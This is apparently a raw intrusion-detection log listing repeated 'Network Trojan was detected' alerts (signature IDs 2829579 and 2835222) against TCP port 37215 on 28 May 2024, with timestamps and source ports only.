          Timestamp:05/28/24-14:47:30.485711
          SID:2829579
          Source Port:35340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130665
          SID:2829579
          Source Port:42112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301235
          SID:2829579
          Source Port:57684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206388
          SID:2829579
          Source Port:46262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795143
          SID:2835222
          Source Port:34816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372139
          SID:2829579
          Source Port:42796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988993
          SID:2835222
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039865
          SID:2829579
          Source Port:33916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214816
          SID:2835222
          Source Port:42448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235812
          SID:2835222
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066519
          SID:2829579
          Source Port:54922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941332
          SID:2835222
          Source Port:45132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238457
          SID:2829579
          Source Port:48178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530137
          SID:2829579
          Source Port:60904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724344
          SID:2835222
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962688
          SID:2835222
          Source Port:38954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885733
          SID:2829579
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216589
          SID:2835222
          Source Port:52790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.814292
          SID:2835222
          Source Port:50660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562212
          SID:2835222
          Source Port:46750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472318
          SID:2835222
          Source Port:47878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690145
          SID:2829579
          Source Port:36400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269161
          SID:2829579
          Source Port:36918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560531
          SID:2829579
          Source Port:45902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361408
          SID:2835222
          Source Port:48286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729607
          SID:2829579
          Source Port:56556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300594
          SID:2835222
          Source Port:58088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236876
          SID:2829579
          Source Port:58516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033073
          SID:2835222
          Source Port:45920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840385
          SID:2829579
          Source Port:59556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.957895
          SID:2835222
          Source Port:57124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208045
          SID:2829579
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739682
          SID:2835222
          Source Port:50730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247826
          SID:2829579
          Source Port:49048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173616
          SID:2835222
          Source Port:34214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437090
          SID:2835222
          Source Port:44332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535228
          SID:2829579
          Source Port:42032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853740
          SID:2829579
          Source Port:34300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147324
          SID:2835222
          Source Port:35888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922641
          SID:2829579
          Source Port:50312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983591
          SID:2829579
          Source Port:57498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216267
          SID:2829579
          Source Port:45654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299387
          SID:2829579
          Source Port:37554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168428
          SID:2835222
          Source Port:43720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542300
          SID:2829579
          Source Port:50524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845855
          SID:2829579
          Source Port:36218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560515
          SID:2829579
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177127
          SID:2829579
          Source Port:41156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889774
          SID:2829579
          Source Port:40766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.091053
          SID:2829579
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482589
          SID:2835222
          Source Port:36894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742419
          SID:2829579
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941266
          SID:2835222
          Source Port:34652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278267
          SID:2829579
          Source Port:43390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591545
          SID:2829579
          Source Port:36976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794755
          SID:2835222
          Source Port:54772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438258
          SID:2835222
          Source Port:51426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529110
          SID:2829579
          Source Port:52708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201717
          SID:2829579
          Source Port:58280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205403
          SID:2829579
          Source Port:42800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.324894
          SID:2829579
          Source Port:47994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473720
          SID:2835222
          Source Port:50444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636894
          SID:2829579
          Source Port:50480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980299
          SID:2835222
          Source Port:45264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222474
          SID:2829579
          Source Port:54246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797803
          SID:2835222
          Source Port:35690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530306
          SID:2835222
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849960
          SID:2835222
          Source Port:40934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842295
          SID:2835222
          Source Port:43188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267373
          SID:2829579
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483546
          SID:2835222
          Source Port:38430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.090928
          SID:2835222
          Source Port:37768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266918
          SID:2829579
          Source Port:60760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859233
          SID:2829579
          Source Port:57856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301269
          SID:2829579
          Source Port:41314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977041
          SID:2835222
          Source Port:52194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471274
          SID:2829579
          Source Port:41994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485241
          SID:2829579
          Source Port:34588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138291
          SID:2835222
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729638
          SID:2835222
          Source Port:60574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337406
          SID:2829579
          Source Port:57048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.017617
          SID:2829579
          Source Port:50320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216336
          SID:2829579
          Source Port:42462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551782
          SID:2835222
          Source Port:38106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877694
          SID:2829579
          Source Port:52274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154095
          SID:2829579
          Source Port:46710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.175479
          SID:2835222
          Source Port:41506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782269
          SID:2829579
          Source Port:55062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803184
          SID:2835222
          Source Port:53094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338708
          SID:2829579
          Source Port:38314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213990
          SID:2835222
          Source Port:43118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628491
          SID:2829579
          Source Port:41086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465371
          SID:2835222
          Source Port:57754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272687
          SID:2835222
          Source Port:55628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598624
          SID:2829579
          Source Port:51252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147958
          SID:2835222
          Source Port:60118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669055
          SID:2835222
          Source Port:34636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960330
          SID:2829579
          Source Port:39004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988946
          SID:2829579
          Source Port:60426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087683
          SID:2829579
          Source Port:50360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299601
          SID:2829579
          Source Port:47876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681992
          SID:2829579
          Source Port:34072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.773822
          SID:2829579
          Source Port:51026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156751
          SID:2829579
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847619
          SID:2835222
          Source Port:58400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066585
          SID:2829579
          Source Port:50798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299754
          SID:2829579
          Source Port:58188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499881
          SID:2829579
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907607
          SID:2829579
          Source Port:36360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.534292
          SID:2829579
          Source Port:40672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272315
          SID:2835222
          Source Port:52544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.067643
          SID:2835222
          Source Port:35326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168298
          SID:2835222
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973190
          SID:2835222
          Source Port:36134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710212
          SID:2835222
          Source Port:44036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087815
          SID:2835222
          Source Port:52260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.604287
          SID:2835222
          Source Port:53152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183603
          SID:2835222
          Source Port:43342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064047
          SID:2829579
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491466
          SID:2829579
          Source Port:33438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178946
          SID:2835222
          Source Port:34948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482802
          SID:2829579
          Source Port:37674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528293
          SID:2829579
          Source Port:49848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219253
          SID:2829579
          Source Port:52802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591396
          SID:2835222
          Source Port:50674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.707359
          SID:2829579
          Source Port:40038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328776
          SID:2829579
          Source Port:44256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215259
          SID:2835222
          Source Port:56572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892538
          SID:2835222
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195721
          SID:2829579
          Source Port:44936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215108
          SID:2835222
          Source Port:56270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136068
          SID:2829579
          Source Port:45772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591391
          SID:2829579
          Source Port:37158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125362
          SID:2829579
          Source Port:48956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684323
          SID:2835222
          Source Port:34398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296167
          SID:2829579
          Source Port:36596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241974
          SID:2829579
          Source Port:52390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741772
          SID:2829579
          Source Port:42968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793399
          SID:2829579
          Source Port:35822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.295492
          SID:2829579
          Source Port:57460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665205
          SID:2835222
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269635
          SID:2829579
          Source Port:49406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590508
          SID:2829579
          Source Port:41566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.798211
          SID:2835222
          Source Port:36784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913286
          SID:2835222
          Source Port:38174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272674
          SID:2835222
          Source Port:32994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203803
          SID:2829579
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998820
          SID:2835222
          Source Port:37910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022858
          SID:2835222
          Source Port:43432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093824
          SID:2835222
          Source Port:53030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732201
          SID:2829579
          Source Port:34462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822544
          SID:2829579
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939501
          SID:2835222
          Source Port:35482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733015
          SID:2829579
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209429
          SID:2835222
          Source Port:46568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849238
          SID:2829579
          Source Port:43834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.847829
          SID:2835222
          Source Port:33778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671874
          SID:2829579
          Source Port:59532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474765
          SID:2829579
          Source Port:33668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492933
          SID:2829579
          Source Port:45854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651312
          SID:2835222
          Source Port:52438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924092
          SID:2835222
          Source Port:51574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039384
          SID:2829579
          Source Port:50674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068449
          SID:2829579
          Source Port:43432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992338
          SID:2829579
          Source Port:33302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019512
          SID:2835222
          Source Port:43590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356837
          SID:2829579
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.217180
          SID:2829579
          Source Port:50986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431338
          SID:2829579
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868082
          SID:2829579
          Source Port:46694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598623
          SID:2829579
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599038
          SID:2829579
          Source Port:59164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594579
          SID:2829579
          Source Port:43058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298228
          SID:2835222
          Source Port:53816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356242
          SID:2835222
          Source Port:35676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557254
          SID:2835222
          Source Port:41678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664580
          SID:2829579
          Source Port:33954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984197
          SID:2829579
          Source Port:44614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545767
          SID:2835222
          Source Port:49568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943511
          SID:2835222
          Source Port:56464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722332
          SID:2829579
          Source Port:52518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.601432
          SID:2835222
          Source Port:33900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908952
          SID:2835222
          Source Port:33810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226536
          SID:2835222
          Source Port:60686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215063
          SID:2829579
          Source Port:45554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689102
          SID:2835222
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.792512
          SID:2835222
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324726
          SID:2835222
          Source Port:41120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144104
          SID:2829579
          Source Port:34464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.246725
          SID:2835222
          Source Port:48710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985203
          SID:2829579
          Source Port:41428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209028
          SID:2829579
          Source Port:42602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466616
          SID:2835222
          Source Port:37394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656246
          SID:2829579
          Source Port:46896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712210
          SID:2835222
          Source Port:54496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112116
          SID:2835222
          Source Port:52382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399928
          SID:2835222
          Source Port:38524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159294
